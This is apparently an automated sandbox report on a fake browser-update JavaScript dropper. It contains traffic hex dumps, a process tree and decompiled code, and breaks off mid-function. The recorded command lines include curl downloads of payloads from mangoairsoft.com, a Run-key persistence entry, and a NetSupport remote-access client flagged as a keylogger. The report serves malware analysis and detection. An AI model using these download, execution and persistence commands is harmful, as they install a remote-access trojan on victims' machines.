2023-08-02 08:35:16 UTC	3311	IN	Data Raw: e9 96 8d f8 ff 8d 8d 34 ff ff ff e9 8b 8d f8 ff 8d 8d 1c ff ff ff e9 80 8d f8 ff 8d 8d 04 ff ff ff e9 75 8d f8 ff 8d 8d ec fe ff ff e9 6a 8d f8 ff b8 c8 66 48 00 e9 1b 2a ff ff cc cc cc 8b 4d f0 e9 d3 f9 fa ff b8 90 67 48 00 e9 06 2a ff ff cc cc ff 75 f0 e8 cc ee f8 ff 59 c3 b8 b8 67 48 00 e9 f0 29 ff ff 8d 4d d4 e9 f7 61 fc ff b8 e0 67 48 00 e9 de 29 ff ff cc cc b8 08 68 48 00 e9 d2 29 ff ff cc cc 8d 4d e0 e9 73 45 fc ff b8 98 68 48 00 e9 be 29 ff ff cc cc 8d 8d 58 ff ff ff e9 58 40 fc ff b8 c0 68 48 00 e9 a7 29 ff ff cc cc cc b8 20 69 48 00 e9 9a 29 ff ff cc cc 8d 4d d0 e9 9f 61 fc ff b8 78 69 48 00 e9 86 29 ff ff cc cc 8d 8d 58 ff ff ff e9 20 40 fc ff b8 a0 69 48 00 e9 6f 29 ff ff cc cc cc 8d 8d c4 fe ff ff e9 08 40 fc ff 8d 8d 5c ff ff ff e9 fd 3f fc Data Ascii: 4ujfHMgHuYgH)MagH)hH)MsEhH)XX@hH) iH)MaxiH)X @iHo)@\?
2023-08-02 08:35:16 UTC	3327	IN	Data Raw: 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 75 73 65 72 33 32 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 36 22 47 00 3a 22 47 00 ff ff ff ff ea 22 47 00 ee 22 47 00 ff ff ff ff 6e 24 47 00 72 24 47 00 48 3a 6d 6d 3a 73 73 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 2f 64 2f 79 79 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41 Data Ascii: opupGetActiveWindowMessageBoxAuser32.dll6"G:"G"G"Gn$Gr$GH:mm:ssdddd, MMMM dd, yyyyM/d/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepA
2023-08-02 08:35:16 UTC	3343	IN	Data Raw: 00 00 3a 53 47 00 06 00 00 00 44 53 47 00 0b 00 00 00 4c 53 47 00 0b 00 00 00 54 53 47 00 06 00 00 00 5c 53 47 00 06 00 00 00 66 53 47 00 0f 00 00 00 6e 53 47 00 10 00 00 00 76 53 47 00 06 00 00 00 7e 53 47 00 06 00 00 00 88 53 47 00 13 00 00 00 90 53 47 00 14 00 00 00 98 53 47 00 14 00 00 00 a2 53 47 00 20 05 93 19 02 00 00 00 78 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b4 53 47 00 00 00 00 00 bf 53 47 00 20 05 93 19 02 00 00 00 a8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d4 53 47 00 ff ff ff ff df 53 47 00 20 05 93 19 01 00 00 00 d8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f4 53 47 00 20 05 93 19 01 00 00 00 00 0e 48 00 00 00 00 00 00 Data Ascii: :SGDSGLSGTSG\SGfSGnSGvSG~SGSGSGSGSG xHSGSG HSGSG HSG H
2023-08-02 08:35:16 UTC	3359	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 9c 7a 47 00 20 05 93 19 06 00 00 00 28 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b0 7a 47 00 00 00 00 00 b8 7a 47 00 01 00 00 00 c3 7a 47 00 02 00 00 00 ce 7a 47 00 03 00 00 00 d9 7a 47 00 04 00 00 00 e4 7a 47 00 20 05 93 19 02 00 00 00 78 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f8 7a 47 00 00 00 00 00 03 7b 47 00 20 05 93 19 01 00 00 00 a8 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 18 7b 47 00 20 05 93 19 04 00 00 00 d0 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 7b 47 00 00 00 00 00 38 7b 47 00 01 00 00 00 43 7b 47 00 02 00 00 00 4e 7b 47 00 20 Data Ascii: zG (MHzGzGzGzGzGzG xMHzG{G MH{G MH0{G8{GC{GN{G
2023-08-02 08:35:16 UTC	3375	IN	Data Raw: 6d 70 61 72 65 46 69 6c 65 54 69 6d 65 00 bc 00 46 69 6c 65 54 69 6d 65 54 6f 53 79 73 74 65 6d 54 69 6d 65 00 00 bb 01 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 fa 01 47 6c 6f 62 61 6c 4d 65 6d 6f 72 79 53 74 61 74 75 73 00 00 77 01 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 41 00 00 88 00 44 6f 73 44 61 74 65 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 ba 00 46 69 6c 65 54 69 6d 65 54 6f 44 6f 73 44 61 74 65 54 69 6d 65 00 4e 03 53 79 73 74 65 6d 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 00 be 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 00 83 03 57 61 69 74 46 6f 72 4d 75 6c 74 69 70 6c 65 4f 62 6a 65 63 74 73 00 00 73 02 4f 70 65 6e 45 76 65 6e 74 41 00 00 65 03 55 6e 6d 61 70 56 69 65 77 4f 66 46 69 6c 65 00 5e 02 4d 61 70 56 69 65 77 4f 66 46 69 Data Ascii: mpareFileTimeFileTimeToSystemTimeGetSystemInfoGlobalMemoryStatuswGetModuleHandleADosDateTimeToFileTimeFileTimeToDosDateTimeNSystemTimeToFileTimeGetSystemTimeWaitForMultipleObjectssOpenEventAeUnmapViewOfFile^MapViewOfFi
2023-08-02 08:35:16 UTC	3391	IN	Data Raw: 00 00 00 00 00 00 42 00 43 00 4a 00 32 00 00 00 00 00 00 00 00 00 e0 58 44 00 60 59 44 00 03 01 03 03 00 00 00 00 28 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 42 00 43 00 4a 00 00 00 90 5b 44 00 c0 5b 44 00 05 02 03 03 00 00 00 00 fc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 e0 5b 44 00 00 5c 44 00 01 04 03 03 00 00 00 00 f0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 20 5c 44 00 40 5c 44 00 01 05 03 03 00 00 00 00 e8 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 60 5c 44 00 80 5c 44 00 01 07 03 03 00 00 00 00 dc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 a0 5c 44 00 c0 5c 44 00 05 08 03 03 00 00 00 00 d0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 53 00 50 00 41 00 52 00 43 00 00 00 41 00 52 00 4d 00 54 00 00 00 00 00 41 00 52 00 4d 00 00 00 49 Data Ascii: BCJ2XD`YD(HBCJ[D[DH[D\DH \D@\DH`\D\DH\D\DHSPARCARMTARMI

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49696	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-02 08:35:17 UTC	3405	OUT	GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat HTTP/1.1 Host: mangoairsoft.com User-Agent: curl/7.55.1 Accept: /
2023-08-02 08:35:17 UTC	3405	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 02 Aug 2023 08:35:17 GMT Content-Type: application/x-msdos-program Content-Length: 532 Connection: close Last-Modified: Thu, 27 Jul 2023 14:27:39 GMT ETag: "214-60178c42f5f39" Accept-Ranges: bytes
2023-08-02 08:35:17 UTC	3405	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 0d 0a 3a 3a 20 73 73 52 73 67 73 33 73 67 73 62 67 73 67 67 73 67 73 33 67 73 67 73 33 73 33 5a 36 0d 0a 3a 3a 20 73 73 52 62 5a 67 73 36 67 73 67 73 33 32 36 66 73 73 52 62 0d 0a 0d 0a 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 78 63 6f 70 79 20 2f 68 20 2f 79 20 37 7a 7a 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 63 6d 64 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 37 7a 7a 2e 65 78 65 20 78 20 2d 79 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 6c 6f 6c 6f 2e 37 7a 20 20 2d 6f 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 54 49 4d 45 4f 55 54 20 2f 54 20 37 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 63 6d 64 20 2f Data Ascii: @echo off:: ssRsgs3sgsbgsggsgs3gsgs3s3Z6:: ssRbZgs6gsgs326fssRbstart /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ && TIMEOUT /T 7 && start /b /min cmd /

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exePID: 3040, Parent PID: 3528

General

Target ID:	0
Start time:	10:35:09
Start date:	02/08/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Browser_update16.0.5836.js"
Imagebase:	0x7ff640970000
File size:	163'840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7064, Parent PID: 3040

General

Target ID:	1
Start time:	10:35:12
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c C://ProgramData//fyAAWPXvDMiNSTKqVPpzzNr.bat
Imagebase:	0x7ff7c72c0000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6704, Parent PID: 7064

General

Target ID:	2
Start time:	10:35:12
Start date:	02/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7088, Parent PID: 7064

General

Target ID:	3
Start time:	10:35:13
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c C:\ProgramData\sett.bat"
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: curl.exePID: 2448, Parent PID: 7088

General

Target ID:	4
Start time:	10:35:13
Start date:	02/08/2023
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"
Imagebase:	0x7ff664370000
File size:	424'448 bytes
MD5 hash:	BDEBD2FC4927DA00EEA263AF9CF8F7ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5792, Parent PID: 7064

General

Target ID:	5
Start time:	10:35:15
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c C:\ProgramData\7z.bat"
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: curl.exePID: 5660, Parent PID: 5792

General

Target ID:	6
Start time:	10:35:15
Start date:	02/08/2023
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
Imagebase:	0x7ff664370000
File size:	424'448 bytes
MD5 hash:	BDEBD2FC4927DA00EEA263AF9CF8F7ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6940, Parent PID: 7064

General

Target ID:	7
Start time:	10:35:16
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c C:\ProgramData\qweq.bat"
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: curl.exePID: 2400, Parent PID: 6940

General

Target ID:	8
Start time:	10:35:16
Start date:	02/08/2023
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"
Imagebase:	0x7ff664370000
File size:	424'448 bytes
MD5 hash:	BDEBD2FC4927DA00EEA263AF9CF8F7ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5472, Parent PID: 6940

General

Target ID:	9
Start time:	10:35:17
Start date:	02/08/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Imagebase:	0x7ff6dc4d0000
File size:	72'704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 4564, Parent PID: 6940

General

Target ID:	10
Start time:	10:35:17
Start date:	02/08/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
Imagebase:	0x7ff6dc4d0000
File size:	72'704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5460, Parent PID: 7064

General

Target ID:	11
Start time:	10:35:17
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c C:\ProgramData\qweq.bat"
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: xcopy.exePID: 7164, Parent PID: 5460

General

Target ID:	12
Start time:	10:35:17
Start date:	02/08/2023
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy /h /y 7zz.exe C:\ProgramData\
Imagebase:	0x7ff7ccc30000
File size:	47'616 bytes
MD5 hash:	6BC7DB1465BEB7607CBCBD7F64007219
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6736, Parent PID: 5460

General

Target ID:	13
Start time:	10:35:18
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 4464, Parent PID: 5460

General

Target ID:	14
Start time:	10:35:18
Start date:	02/08/2023
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	TIMEOUT /T 7
Imagebase:	0x7ff7c06d0000
File size:	30'720 bytes
MD5 hash:	EB9A65078396FB5D4E3813BB9198CB18
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: 7zz.exePID: 7076, Parent PID: 6736

General

Target ID:	15
Start time:	10:35:18
Start date:	02/08/2023
Path:	C:\ProgramData\7zz.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
Imagebase:	0x400000
File size:	587'776 bytes
MD5 hash:	42BADC1D2F03A8B1E4875740D3D49336
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7036, Parent PID: 5460

General

Target ID:	16
Start time:	10:35:26
Start date:	02/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c C:\ProgramData\client32.exe
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 4572, Parent PID: 5460

General

Target ID:	17
Start time:	10:35:26
Start date:	02/08/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Imagebase:	0x7ff6dc4d0000
File size:	72'704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: client32.exePID: 2808, Parent PID: 7036

General

Target ID:	18
Start time:	10:35:26
Start date:	02/08/2023
Path:	C:\ProgramData\client32.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\client32.exe
Imagebase:	0x210000
File size:	101'680 bytes
MD5 hash:	F70B67C2B3204B7DDD8B755799CCCFF0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.1074711959.0000000003270000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.1074711959.000000000325F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000000.586153494.0000000000212000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.1074264589.0000000000212000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
Antivirus matches:	Detection: 12%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 2108, Parent PID: 5460

General

Target ID:	19
Start time:	10:35:26
Start date:	02/08/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
Imagebase:	0x7ff6dc4d0000
File size:	72'704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: client32.exePID: 2220, Parent PID: 3528

General

Target ID:	20
Start time:	10:35:27
Start date:	02/08/2023
Path:	C:\ProgramData\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\client32.exe"
Imagebase:	0x210000
File size:	101'680 bytes
MD5 hash:	F70B67C2B3204B7DDD8B755799CCCFF0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000002.591691313.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000002.590783573.0000000000212000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000014.00000000.588400039.0000000000212000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: client32.exePID: 6920, Parent PID: 3528

General

Target ID:	21
Start time:	10:35:35
Start date:	02/08/2023
Path:	C:\ProgramData\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\client32.exe"
Imagebase:	0x210000
File size:	101'680 bytes
MD5 hash:	F70B67C2B3204B7DDD8B755799CCCFF0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.607562587.0000000000212000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.606379761.0000000000212000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.608303721.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 7zz.exePID: 7076, Parent PID: 6736COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	14

Executed Functions

Function 00403A70 Relevance: 46.7, APIs: 3, Strings: 23, Instructions: 1177
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00403A70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t502;
				signed int _t503;
				signed char _t504;
				signed int _t507;
				signed int _t508;
				char _t517;
				signed int _t518;
				signed int _t534;
				signed int _t549;
				signed int _t554;
				signed int _t569;
				void* _t571;
				void* _t574;
				void* _t577;
				signed int _t583;
				void* _t598;
				signed int _t614;
				signed int _t625;
				signed int _t626;
				signed int _t642;
				signed int _t647;
				signed int _t648;
				intOrPtr* _t676;
				void* _t689;
				signed int _t706;
				intOrPtr* _t720;
				signed int _t725;
				void* _t729;
				signed int _t730;
				signed int _t739;
				signed int _t757;
				signed int _t764;
				signed int _t769;
				signed int _t784;
				unsigned char _t786;
				signed char _t787;
				signed int _t788;
				signed char _t792;
				signed int _t793;
				signed int _t794;
				signed int _t809;
				signed int _t812;
				signed int _t815;
				intOrPtr _t829;
				intOrPtr _t861;
				signed int _t918;
				intOrPtr _t996;
				signed int _t1065;
				signed int _t1066;
				signed int _t1068;
				signed int _t1069;
				signed int _t1070;
				signed int _t1071;
				char* _t1073;
				signed int _t1075;
				char* _t1077;
				char* _t1079;
				char* _t1080;
				void* _t1081;
				void* _t1083;
				void* _t1084;

				E0046B890(E00473088, _t1081);
				_t1084 = _t1083 - 0x36c;
				_push(__ebx);
				SetFileApisToOEM();
				E00405B9F(_t1081 - 0x4c);
				 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
				_t1075 = 0;
				 *(_t1081 - 4) = 0;
				E00403532(_t1081 - 0x2c, GetCommandLineW());
				_t1049 = _t1081 - 0x4c;
				 *(_t1081 - 4) = 1;
				E00406C53(_t1081 - 0x2c, _t1081 - 0x4c);
				 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
				E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
				if( *((intOrPtr*)(_t1081 - 0x44)) != 1) {
					E004036D9(__ebx, _t1081 - 0x4c, 0, 0, 1);
					E00404C12(_t1081 - 0x2d8);
					 *(_t1081 - 4) = 3;
					E0040FEC3(_t1081 - 0x7c);
					_push(_t1081 - 0x2d8);
					_push(_t1081 - 0x4c);
					 *(_t1081 - 4) = 4;
					L0040FED1(_t1081 - 0x7c, __eflags);
					__eflags =  *((char*)(_t1081 - 0x2d8));
					if( *((char*)(_t1081 - 0x2d8)) == 0) {
						__eflags =  *((char*)(_t1081 - 0x2d7));
						if( *((char*)(_t1081 - 0x2d7)) != 0) {
							E00458600();
							L0040BF39(1);
						}
						__eflags =  *((char*)(_t1081 - 0x2d2));
						_t829 = 0x490ab0;
						if( *((char*)(_t1081 - 0x2d2)) == 0) {
							_t829 = 0x490ab8;
						}
						__eflags =  *((char*)(_t1081 - 0x2d1));
						 *0x490a80 = _t829;
						if( *((char*)(_t1081 - 0x2d1)) != 0) {
							_t1049 = 0;
							__eflags = 0;
							E004051E3(_t829, 0);
						}
						_push(_t1081 - 0x2d8); // executed
						E0041035D(_t1081 - 0x7c); // executed
						_push(0x1c);
						_t502 = E004079F2();
						 *(_t1081 - 0x14) = _t502;
						__eflags = _t502 - _t1075;
						 *(_t1081 - 4) = 6;
						if(_t502 == _t1075) {
							_t1065 = 0;
							__eflags = 0;
